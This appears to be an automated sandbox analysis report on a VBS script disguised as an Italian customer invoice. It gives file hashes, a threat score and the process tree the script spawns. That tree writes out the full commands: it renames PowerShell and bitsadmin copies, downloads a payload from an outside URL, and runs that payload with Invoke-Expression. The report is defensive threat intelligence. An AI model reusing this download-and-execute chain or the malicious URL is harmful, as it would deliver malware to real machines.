Analysis
-
max time kernel
63s -
max time network
33s -
platform
windows7_x64 -
resource
win7 -
submitted
13-07-2020 07:18
Static task
static1
Behavioral task
behavioral1
Sample
Fatt_cliente_00453830309.vbs
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Fatt_cliente_00453830309.vbs
Resource
win10v200430
0 signatures
0 seconds
General
-
Target
Fatt_cliente_00453830309.vbs
-
Size
3KB
-
MD5
62b3b8b5c2ceacaee5e3e22939c45a43
-
SHA1
3a579492c1c373cb61ced3c7a88cffb13d73e1ac
-
SHA256
77e7a4deb92496d0954a6fd03cece71dfd53bc774cfb89dc16410c91cf09f598
-
SHA512
0b969e6f0163f22402bfb31f424ff33b8985a1406fd65936e4239b31ba1b75501cbea31bd944cd02c97d88e707e08097b83b8b258e2352b4f92286e09fac93d1
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
WScript.exedescription pid process target process PID 1108 wrote to memory of 1432 1108 WScript.exe cmd.exe PID 1108 wrote to memory of 1432 1108 WScript.exe cmd.exe PID 1108 wrote to memory of 1432 1108 WScript.exe cmd.exe PID 1108 wrote to memory of 676 1108 WScript.exe cmd.exe PID 1108 wrote to memory of 676 1108 WScript.exe cmd.exe PID 1108 wrote to memory of 676 1108 WScript.exe cmd.exe PID 1108 wrote to memory of 368 1108 WScript.exe FeUgzu.exe PID 1108 wrote to memory of 368 1108 WScript.exe FeUgzu.exe PID 1108 wrote to memory of 368 1108 WScript.exe FeUgzu.exe PID 1108 wrote to memory of 368 1108 WScript.exe FeUgzu.exe PID 1108 wrote to memory of 1860 1108 WScript.exe zFeUgzu.exe PID 1108 wrote to memory of 1860 1108 WScript.exe zFeUgzu.exe PID 1108 wrote to memory of 1860 1108 WScript.exe zFeUgzu.exe PID 1108 wrote to memory of 1860 1108 WScript.exe zFeUgzu.exe -
Executes dropped EXE 2 IoCs
Processes:
FeUgzu.exezFeUgzu.exepid process 368 FeUgzu.exe 1860 zFeUgzu.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
zFeUgzu.exedescription pid process Token: SeDebugPrivilege 1860 zFeUgzu.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
zFeUgzu.exepid process 1860 zFeUgzu.exe 1860 zFeUgzu.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_00453830309.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zFeUgzu.exe2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\FeUgzu.exe2⤵
-
C:\Users\Admin\AppData\Roaming\FeUgzu.exe"C:\Users\Admin\AppData\Roaming\FeUgzu.exe" /transfer DQeUoq /download https://sheyenneweber.com/webol/00453830309/uk.jpg C:\Users\Admin\AppData\Roaming\uk.jpg2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\zFeUgzu.exe"C:\Users\Admin\AppData\Roaming\zFeUgzu.exe" -c &{$us=gc C:\Users\Admin\AppData\Roaming\uk.jpg| Out-String; Invoke-Expression $us }2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\FeUgzu.exe
-
C:\Users\Admin\AppData\Roaming\FeUgzu.exe
-
C:\Users\Admin\AppData\Roaming\zFeUgzu.exe
-
C:\Users\Admin\AppData\Roaming\zFeUgzu.exe
-
memory/368-3-0x0000000000000000-mapping.dmp
-
memory/676-1-0x0000000000000000-mapping.dmp
-
memory/1108-10-0x0000000002510000-0x0000000002514000-memory.dmpFilesize
16KB
-
memory/1432-0-0x0000000000000000-mapping.dmp
-
memory/1860-6-0x0000000000000000-mapping.dmp